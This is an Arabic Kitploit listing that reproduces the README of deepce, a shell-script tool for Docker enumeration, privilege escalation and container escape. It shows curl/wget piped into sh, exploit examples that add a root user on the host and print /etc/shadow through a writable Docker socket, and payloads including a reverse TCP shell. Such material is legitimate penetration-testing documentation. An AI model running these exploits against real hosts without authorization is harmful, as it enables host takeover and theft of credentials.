Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
deepce — تعداد Docker، تصعيد الصلاحيات والهروب من الحاويات (DEEPCE) | Kitploit
أدوات/GitHubGitHub/stealthcopter/deepce
كسر كلمات المرورتصعيد الامتيازاتالاستطلاعأمن الحاوياتالاستغلالأمن الشبكاتاختبار الاختراقالهروب من الحاويةالأفضل في الهروب من الحاوية #1
GitHub
1.6k12322منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
stealthcopter/deepce

deepce

تعداد Docker، تصعيد الصلاحيات والهروب من الحاويات (DEEPCE)

عرض المستودع

deepce

root@kitploit:~
                      ##         .
                ## ## ##        ==
             ## ## ## ##       ===
         /"""""""""""""""""\___/ ===
    ~~~ {~~ ~~~~ ~~~ ~~~~ ~~~ ~ /  ===- ~~~
         \______ X           __/
           \    \         __/
            \____\_______/
          __                        
     ____/ /__  ___  ____  ________ 
    / __  / _ \/ _ \/ __ \/ ___/ _ \   ENUMERATE
   / /_/ /  __/  __/ /_/ / (__/  __/  ESCALATE
   \__,_/\___/\___/ .___/\___/\___/  ESCAPE
                 /_/

ShellCheck ContainerTests

Twitter

الموقع الإلكتروني

تعداد Docker، تصعيد الامتيازات والهروب من الحاويات (DEEPCE)

لكي يكون متوافقًا مع أكبر عدد ممكن من الحاويات، كُتب DEEPCE بلغة sh نقية دون أي تبعيات. سيستخدم أدوات إضافية مثل curl وnmap وnslookup وdig إذا كانت متاحة، لكنه في معظم الحالات لا يعتمد عليها في التعداد.

لا ينبغي أن تلمس أي من عمليات التعداد القرص، ومع ذلك فإن معظم الاستغلالات تُنشئ حاويات جديدة مما يسبب كتابة على القرص، وبعض الاستغلالات ستعيد كتابة runC وهو ما قد يكون مدمرًا، لذا كن حذرًا!

يرجى الاطلاع أدناه على قائمة التعدادات والاستغلالات والحمولات التي يمكن لـ DEEPCE استخدامها. إذا كانت لديك أفكار لمزيد من الإضافات، فيرجى إرسال مشكلة (issue) في GitHub!

التحميل

يمكن تنزيل DEEPCE على مضيف أو حاوية باستخدام أحد الأوامر المفردة التالية. نصيحة: نزّل إلى /dev/shm لتجنب لمس القرص.

root@kitploit:~
wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh  

الدعم

إذا كنت تحب ما أقدمه في Deepce ومشاريعي الأخرى، يمكنك الآن دعم عملي مباشرة! بشراء فنجان قهوة لي ☕، فأنت لا تغذي احتياجي للكافيين فقط – بل تساعدني على تخصيص مزيد من الوقت لتطوير وتحسين هذه المشاريع مفتوحة المصدر. كل فنجان قهوة له أهميته ويجلب المزيد من الابتكار لعالم الأمن السيبراني. شكرًا لدعمك – فهو يعني الكثير لي ولمجتمع المصادر المفتوحة!

لقطات الشاشة

لمزيد من الصور، يرجى الاطلاع على مجلد الوثائق screenshot1

التعدادات

فيما يلي قائمة التعدادات التي ينفذها DEEPCE.

  • معرف الحاوية والاسم (عبر DNS عكسي)
  • عنوان IP الخاص بالحاوية / خادم DNS
  • إصدار Docker
  • نقاط التحميل المثيرة للاهتمام
  • كلمات المرور في الملفات الشائعة
  • متغيرات البيئة
  • تجزئات كلمات المرور
  • الملفات الحساسة الشائعة المخزنة في الحاويات
  • الحاويات الأخرى على نفس الشبكة
  • فحص منافذ الحاويات الأخرى وجهاز المضيف نفسه
  • العثور على مقبس Docker المكشوف

الاستغلالات

  • تصعيد الامتيازات عبر مجموعة Docker
  • تنفيذ أوامر على المضيف عبر الوضع المميز
  • مقبس Docker المكشوف

الحمولات

لكل من الاستغلالات المذكورة أعلاه يمكن تعريف حمولات بهدف استغلال النظام المضيف. وتشمل هذه:

  • قشرة TCP عكسية
  • طباعة /etc/shadow
  • إضافة مستخدم جذر جديد
  • تشغيل أوامر مخصصة
  • تشغيل ملفات حمولة ثنائية مخصصة

أمثلة

root@kitploit:~
# Make the script executable and then run it
chmod +x ./deepce.sh
./deepce.sh 

الاستغلالات

توضح الأمثلة التالية الأنواع المختلفة من الاستغلالات التي يمكن تنفيذها والحمولات المتاحة.

  • استغلال حاوية في الوضع المميز لإنشاء مستخدم جذر جديد على نظام التشغيل المضيف:
root@kitploit:~
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
  • استغلال ملف مقبس Docker قابل للكتابة لطباعة محتويات /etc/shadow
root@kitploit:~
./deepce.sh --no-enumeration --exploit SOCK --shadow
  • تصعيد الصلاحيات إلى الجذر عبر العضوية في مجموعة docker على مضيف وتشغيل حمولة مخصصة
root@kitploit:~
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"

الاستخدام المتقدم

من الممكن تنزيل deepce وتشغيله دون لمس القرص، ومع ذلك لن تتمكن من تعيين الوسائط بسهولة (يمكن التلاعب بالمتغيرات مباشرة باستخدام export).

root@kitploit:~
wget -O - https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh

الإلهام

هناك بعض النصوص البرمجية والأدوات الرائعة لتعداد الحاويات والهروب منها والتي استوحيت منها عند كتابة هذا المشروع. ومع ذلك، شعرت بالحاجة إلى كتابة أداة بلغة sh فقط لتجنب الاضطرار إلى تثبيت تبعيات go أو ruby أو الاعتماد على ملف ثنائي ثابت. كما أردت أن أكون قادرًا على إجراء المزيد من عمليات التعداد لمحاولة اكتشاف ما هي حاوية Docker، لأنه أثناء الاختبار قد نجد أنفسنا داخل حاوية غير معروفة. لقد تزايد عدد الأشياء التي يمكن لهذا النص البرمجي تعدادها بشكل كبير، ففي كل مرة أضيف شيئًا جديدًا كنت أفكر في أشياء إضافية أخرى يمكنني إضافتها.

  • LinPEAS
  • LinEnum
  • BotB
  • Harpoon

الموارد

للمطورين الباحثين عن نصائح أمان Docker https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md

المساهمة

أرحب بطلبات السحب (pull requests) والقضايا (issues) والملاحظات.

  • انسخ المشروع (Fork)
  • أنشئ فرع الميزة الخاص بك (git checkout -b my-new-feature)
  • أرسل التغييرات (git commit -am 'Added some feature')
  • ادفع إلى الفرع (git push origin my-new-feature)
  • أنشئ طلب سحب جديد
تنزيل الأداة